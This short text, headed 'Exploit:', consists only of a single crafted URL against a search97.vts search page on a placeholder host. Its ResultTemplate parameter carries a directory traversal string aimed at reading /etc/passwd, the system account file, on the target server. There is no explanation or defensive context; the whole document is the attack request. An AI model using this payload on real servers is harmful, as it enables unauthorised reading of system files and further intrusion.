Exploit:

	http://www.xxx.com/search97.vts
	  ?HLNavigate=On&querytext=dcm
	  &ServerKey=Primary
	  &ResultTemplate=../../../../../../../etc/passwd
	  &ResultStyle=simple
	  &ResultCount=20
	  &collection=books